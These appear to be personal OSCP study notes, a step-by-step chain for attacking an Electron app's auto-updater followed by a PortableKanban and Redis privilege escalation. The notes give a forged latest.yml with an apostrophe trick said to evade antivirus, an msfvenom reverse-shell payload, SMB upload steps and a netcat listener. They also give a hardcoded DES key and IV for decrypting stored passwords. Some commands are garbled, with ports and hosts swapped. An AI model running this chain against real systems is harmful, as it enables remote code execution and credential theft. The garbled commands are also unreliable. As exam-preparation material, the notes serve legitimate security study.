O
O
OSCP Notes
Search…
⌃K

Electron App (decompile and find secrets!)

  • auto update feature
  • Download the setup zip file with smb/ftp
  • and extract it ---> plugin folder
1.app-64.7z -> 7z x app_64.7z to extract it.
1.app.asar ->sudo npm g install asar
asar l app.asar (lists files)
asar ef app.asar main.js (this command extracts a main.js file from the app)
asar e app.asar $(pwd) - extracts everything?
Google electron updater RCE exploit.
version: 1.2.3
files:
- url: v’ulnerable-app-setup-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
size: 44653912
path: v'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'
the apostrofe can evade AV sig.
msfvenom -p windows/x64/shellreversetcp LPORT=ADFKASF LHOST=5555 -f exe -o rev.exe
modify the exploit
version: 1.2.3
files:
- url: r’ev.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
size: 7168
path: r'ev.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2021-11-20T11:17:02.627Z'
sha512sum rev.exe | awk '{print $1}' | xxd -r -p | base64 -w 0
paste the sha512
smbclient //IP/Software_Updates
put latest.yml
put rev.exe
and set up a nc listener
///
Priv Esc:

PortableKanban

Portablekanban.config
Read the config and se theDbport & DbEncpassword
go to cyberchef website and decrypt the pass.
  • copy the enc pass and select from base64 option
  • copy the DES key.
  • drag and drop decrypt DES key (
    DES 7ly6UznJ
    IV XuVUm5fR
it uses redis
redis-cli -h IP
>> auth pass
>> ping
>> keys * (lists all the keys)
>> get "key"
decrypt the pass with the same config on the cybershef.